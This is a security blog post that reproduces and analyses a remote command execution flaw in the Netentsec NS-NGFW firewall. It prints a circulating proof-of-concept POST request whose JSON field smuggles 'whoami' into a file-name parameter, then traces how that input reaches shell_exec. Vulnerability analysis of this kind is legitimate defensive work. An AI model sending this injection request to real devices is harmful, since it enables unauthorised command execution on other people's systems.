c1ay's blog

2021HW总结-网康NS-NGFW rce复现分析

字数统计: 685阅读时长: 3 min
2021/04/29 Share

流传的POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /directdata/direct/router HTTP/1.1
Host: xxx
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/11.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

漏洞分析

根据目录结构可以看出开发使用了Zend Freamwork php框架

根据请求路由/directdata/direct/router定位到漏洞的入口位置:

applications/directdata/controllers/DirectController.phprouterAction方法

mark

跟进这里Ext_Direct类的静态方法run函数:Ext_Direct::run($this->getRequest())

applications/Models/Ext/Direct.php当中

mark
mark

继续跟进这里run方法当中的Ext_Direct_Request::factory($request)

于是跟踪到了applications/Models/Ext/Direct/Request.php当中

mark

这里通过file_get_contents('php://input')对POST过来的数据进行了接收,根据上面的POC可以得知这里接收的内容为:

1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/11.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

把这串数据的json_decode打印出来看看是什么:

mark

可以看到经过json_decode处理后的数据为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
object(stdClass)#1 (6) {
["action"]=>
string(15) "SSLVPN_Resource"
["method"]=>
string(11) "deleteImage"
["data"]=>
array(1) {
[0]=>
object(stdClass)#2 (1) {
["data"]=>
array(1) {
[0]=>
string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
}
}
}
["type"]=>
string(3) "rpc"
["tid"]=>
int(17)
["f8839p7rqtj"]=>
string(1) "="
}

所以获取到$data变量当中的数据符合下面这段代码

1
2
3
4
5
6
7
8
if (
is_object($data) && $data->type && $data->tid &&
$data->action && $data->method
)
return new Ext_Direct_Request(
$data->type, $data->tid, $data->action,
$data->method, $data->data
);

这里主要根据获取到的数据对Ext_Direct_Request对象进行初始化,然后作为Ext_Direct_Request::factory($request)的返回值

applications/Models/Ext/Direct/Request.php

mark

最终在执行到applications/Models/Ext/Direct.php当中的run函数的call_user_func_array处,调用了SSLVPN_Resource类的deleteImage方法,传入的参数为:

1
2
3
4
5
6
7
8
9
10
array(1) {
[0]=>
object(stdClass)#2 (1) {
["data"]=>
array(1) {
[0]=>
string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
}
}
}

定位到SSLVPN_Resource类的相关代码,追踪到applications/Models/SSLVPN/Resource.php当中的deleteImage方法:

mark

这里传入的$params变量内容为:

1
2
3
4
5
6
7
object(stdClass)#2 (1) {
["data"]=>
array(1) {
[0]=>
string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
}
}

最终在执行shell_exec的时候,可控输入/var/www/html/d.txt;whoami>/var/www/html/11.txt被拼接入$cmd参数,产生了命令执行

CATALOG
  1. 1. 流传的POC
  2. 2. 漏洞分析